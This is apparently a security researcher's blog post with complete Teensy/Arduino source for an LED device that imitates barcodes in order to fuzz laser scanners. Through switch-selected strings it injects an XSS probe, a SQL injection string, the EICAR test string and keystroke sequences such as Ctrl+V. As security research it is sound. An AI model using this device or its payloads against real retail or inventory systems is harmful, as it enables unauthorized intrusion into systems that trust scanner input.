Barcode Fuzzer, Bruteforcer, SQL/XSS Injector using a flashing LED
Update: Check out the Barcode Laser Emitter: Evil checks-out at a distance
As some of you know, I have and interest in odd attack vectors. One of the vectors I've been playing with is barcodes, see my article: XSS, SQL Injection and Fuzzing Bar Code Cheat Sheet. Original I wanted to buy a Nook, Kindle or some other device with an E-ink display so I could write an app that lets me pragmatically throw barcodes at a system with odd formatting to see if I could make a system fail in interesting ways. I still plan to do this at some point since E-Ink is a more flexible solution (it should work with 2d barcodes, optical scanners, and picky 1d barcode readers, whereas the hack presented on this page will not), but E-book readers are expensive. Then I remembered Bruce Potter saying something about a guy that entered the Shmoocon barcode shmarcode contest with a device that flashed out his barcode using a simple LED. Bruce and C-P helped me find the guy's name: Nathan Pegram. Nathan did not have the code on hand to give me, but he gave me some tips on timing and playing the barcode both backwards and forwards to make the system more reliable.
I coded mine for the Teensy, but it should work on an Arduino as well as long as you change the pin numbers. The LED is turned on for sections of the barcode that should be white (this simulates reflected light), and off for black sections of the barcode (very little reflected light). I've only done the Code 128 and Code 39 barcode encodings. While this is be no means a complete barcode fuzzer/bruteforcer, it should be enough code for you to write up your own custom application.
Teensy barcode flasher hooked to a large external USB power source. | Teensy without battery, and a laser barcode scanner. |
The code below has the option to flash a few example barcodes:
The stings:
"abc123"
"e7e7f559-ce13-fd7f-baf0-9b4908dd1c73"
"<script>alert(\"Irongeek Was Here\")</script>"
"' or 1=1 -- "
"X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
in both Code 128b and Code 39 symbologies.
Also, using Code 128a my LED flasher will
try to do a Ctrl-V to paste in whatever is in the clip board, as well as
another option to send the first 31 ASCII characters just to see what will
happen. :)
I plan to make a video once I find someone to hold the camera and change angles for me. This code will not work if your barcode scanner is optical, only barcode pens and laser barcode readers should work.
Download from:
http://www.irongeek.com/downloads/barcodeplay/barcodeplay.pde
/* Flashing LED Barcode Emulator ver 0.1 by Adrian Crenshaw http://irongeek.com Inspired by Nathan Pegram's Shmoocon Barcode Contest Entry Thanks to Nathan for some tips on timing. Thanks to Bruce Potter and C-P for pointing me towards Nathan This code will not work if your barcode scanner is optical, only pens and laser barcode readers should work. You may have to play with the timing (delaybase). */ const int ledPin = 21; // the number of the LED pin // Variables will change: int delaybase = 25; //100 best for pen reader? //20 was good for code 39 and laser #define STR_LENGTH 500 //500 should give us 100 Code 128 characters and 50 Code 39 char BarcodeBuf[STR_LENGTH]=""; //char RevBarcodeBuf[STR_LENGTH]=""; //All Code 39 symbols buffered by 1 so we end on a white space. char* code39bars[]={ "1113313111", "3113111131", "1133111131", "3133111111", "1113311131", "3113311111", "1133311111", "1113113131", "3113113111", "1133113111", "3111131131", "1131131131", "3131131111", "1111331131", "3111331111", "1131331111", "1111133131", "3111133111", "1131133111", "1111333111", "3111111331", "1131111331", "3131111311", "1111311331", "3111311311", "1131311311", "1111113331", "3111113311", "1131113311", "1111313311", "3311111131", "1331111131", "3331111111", "1311311131", "3311311111", "1331311111", "1311113131", "3311113111", "1331113111", "1313131111", "1313111311", "1311131311", "1113131311", "1311313111" }; char* code128bars[]={ "212222", "222122", "222221", "121223", "121322", "131222", "122213", "122312", "132212", "221213", "221312", "231212", "112232", "122132", "122231", "113222", "123122", "123221", "223211", "221132", "221231", "213212", "223112", "312131", "311222", "321122", "321221", "312212", "322112", "322211", "212123", "212321", "232121", "111323", "131123", "131321", "112313", "132113", "132311", "211313", "231113", "231311", "112133", "112331", "132131", "113123", "113321", "133121", "313121", "211331", "231131", "213113", "213311", "213131", "311123", "311321", "331121", "312113", "312311", "332111", "314111", "221411", "431111", "111224", "111422", "121124", "121421", "141122", "141221", "112214", "112412", "122114", "122411", "142112", "142211", "241211", "221114", "413111", "241112", "134111", "111242", "121142", "121241", "114212", "124112", "124211", "411212", "421112", "421211", "212141", "214121", "412121", "111143", "111341", "131141", "114113", "114311", "411113", "411311", "113141", "114131", "311141", "411131", "211412", "211214", "211232", "2331112"}; void setup() { pinMode(ledPin, OUTPUT); for (int thispin=3; thispin <=10;thispin++){ pinMode(thispin, INPUT_PULLUP); // Se them high by default } } void loop() { if (!digitalRead(3)){ //Uber simple test sting SendUSingDIPChoice("abc123"); } if (!digitalRead(4)){ //My old Shmoocon 2010 barcode SendUSingDIPChoice("e7e7f559-ce13-fd7f-baf0-9b4908dd1c73"); } if (!digitalRead(5)){ //Simple XSS attack, who sanitizes barcode input? SendUSingDIPChoice("<script>alert(\"Irongeek Was Here\")</script>"); } if (!digitalRead(6)){ //Simle SQL Injection attack via barcode SendUSingDIPChoice("' or 1=1 -- "); } if (!digitalRead(7)){//The EICAR test string, to see if AV freaks out SendUSingDIPChoice("X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"); } if (!digitalRead(8)){ Code128StringSend("TRY TO PASTE v",103); //v in 128a should be a Ctrl+V } if (!digitalRead(9)){//Send some odd stuff, see what key press it is interpreted as int points[]={ 64,65,66,67,68,69,70,71,72,73,74,75,75,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95 }; Code128IntArrSend(points, 103, 31); } //Uncomment code below to try alternating timings /* char buf[6]; Code128StringSend(strcat(TestString, itoa(delaybase, buf, 10))); delaybase++; if (delaybase>1000){ delaybase=1; } */ } void SendUSingDIPChoice(char *SomeString) { if (!digitalRead(10)) { //Default to sending in Code 128b Code39StringSend(SomeString); } else { Code128StringSend(SomeString, 104); //104 means 128b, 103 is a, 105 is c } } //Based on stuff from http://www.codeguru.com/forum/showthread.php?t=303185 //not used yet char* rev(char* str) { int end= strlen(str)-1; int start = 0; while( start<end ) { str[start] ^= str[end]; str[end] ^= str[start]; str[start]^= str[end]; ++start; --end; } return str; } int ASCIItoCode128Point(char Cvalue)// Converts the ASCII value to it's place in the Code 128 chart { int Ivalue=(int)Cvalue; if (Ivalue == 32){ return 0; } if (Ivalue >= 33 && Ivalue <= 126){ return Ivalue-32; } if (Ivalue >= 145){ return Ivalue-50; } if (Ivalue <= 31){ //Not used yet, but will be needed for Code 128a return Ivalue+64; } } int ASCIItoCode39Point(char Cvalue)// Converts the ASCII value to it's place in the Code 39 chart { int Ivalue=(int)Cvalue; if (Ivalue >= 48 && Ivalue <= 57){ return Ivalue-48; } if (Ivalue >= 65 && Ivalue <= 90){ return Ivalue-55; } if (Ivalue >= 97 && Ivalue <= 122){ return Ivalue-87; } switch (Cvalue) { case '-': return 36; break; case '.': return 37; break; case ' ': return 38; break; case '$': return 39; break; case '/': return 40; break; case '+': return 41; break; case '%': return 42; break; case '*': return 43; break; } } void UpperCase(char *SomeString) //Not used since I changed the wat I do code 39 { int i; for (i = 0; SomeString[i]!='\0'; i++) { if (SomeString[i] >= 97 && SomeString[i] <= 122){ SomeString[i]=SomeString[i]-32; } } } void Code128StringSend(char *SomeString, int ver) //Send the string. Ver should be 103 for 128a, 104 for 128b and 105 for 128c //Current code does not let you mix Code 128 versions { int i; int CheckSum = Code128CheckSum(SomeString, ver); //104 means Code 128B BarcodeBuf[0] = '\0'; //Turn on LED to read as white space digitalWrite(ledPin, LOW); delayMicroseconds(delaybase*100); strcat(BarcodeBuf, code128bars[ver]);//Code 128B start for (i = 0; SomeString[i]!='\0'; i++) { strcat(BarcodeBuf, code128bars[ASCIItoCode128Point(SomeString[i])]); } strcat(BarcodeBuf, code128bars[CheckSum]); //Checksum strcat(BarcodeBuf, "2331112"); //Code 128 end FlashSeq(BarcodeBuf); //Serial.println(BarcodeBuf); //Turn on LED to read as white space digitalWrite(ledPin, LOW); delayMicroseconds(delaybase*25); FlashSeq(rev(BarcodeBuf)); //Playing it backard helps reliability //Turn on LED to read as white space digitalWrite(ledPin, LOW); delayMicroseconds(delaybase*100); //Serial.println(BarcodeBuf); } void Code128IntArrSend(int *SomeIntArr, int ver, int arsize) //Using this for some odd characters //Send the string. Ver should be 103 for 128a, 104 for 128b and 105 for 128c //Current code does not let you mix Code 128 versions { int i; int CheckSum = Code128CheckSumInt(SomeIntArr, ver, arsize); //104 means Code 128B BarcodeBuf[0] = '\0'; //Turn on LED to read as white space digitalWrite(ledPin, LOW); delayMicroseconds(delaybase*100); strcat(BarcodeBuf, code128bars[ver]);//Code 128B start for (i = 0; i<arsize; i++) { strcat(BarcodeBuf, code128bars[SomeIntArr[i]]); } strcat(BarcodeBuf, code128bars[CheckSum]); //Checksum strcat(BarcodeBuf, "2331112"); //Code 128 end FlashSeq(BarcodeBuf); //Serial.println(BarcodeBuf); //Turn on LED to read as white space digitalWrite(ledPin, LOW); delayMicroseconds(delaybase*25); FlashSeq(rev(BarcodeBuf)); //Playing it backard helps reliability //Turn on LED to read as white space digitalWrite(ledPin, LOW); delayMicroseconds(delaybase*100); //Serial.println(BarcodeBuf); } int Code128CheckSum(char *SomeString, int variant) { int i; long PointSum=variant; for (i = 0; SomeString[i]!='\0'; i++) { PointSum = PointSum + ((i+1)*ASCIItoCode128Point(SomeString[i])); } return PointSum%103; } int Code128CheckSumInt(int *SomeIntArr, int variant, int arsize) { int i; long PointSum=variant; for (i = 0; i<arsize; i++) { PointSum = PointSum + ((i+1)*SomeIntArr[i]); } return PointSum%103; } void Code39StringSend(char *SomeString) { int i; BarcodeBuf[0] = '\0'; //Turn on LED to read as white space digitalWrite(ledPin, LOW); delayMicroseconds(delaybase*100); strcat(BarcodeBuf, "1311313111");//Code 39 start for (i = 0; SomeString[i]!='\0'; i++) { strcat(BarcodeBuf, code39bars[ASCIItoCode39Point(SomeString[i])]); } strcat(BarcodeBuf, "1311313111"); //Code 39 end FlashSeq(BarcodeBuf); //Turn on LED to read as white space digitalWrite(ledPin, LOW); delayMicroseconds(delaybase*25); //Serial.println(BarcodeBuf); FlashSeq(rev(BarcodeBuf));//Playing it backard helps reliability //Turn on LED to read as white space digitalWrite(ledPin, LOW); delayMicroseconds(delaybase*100); //Serial.println(BarcodeBuf); } void FlashSeq(char *FlashMe)//I do the real work, and switch between black and white areas { int i; int B = HIGH; for (i = 0; FlashMe[i] != '\0'; i++) { digitalWrite(ledPin, B); delayMicroseconds(delaybase*(((int)FlashMe[i])-48)); B=!B; } } |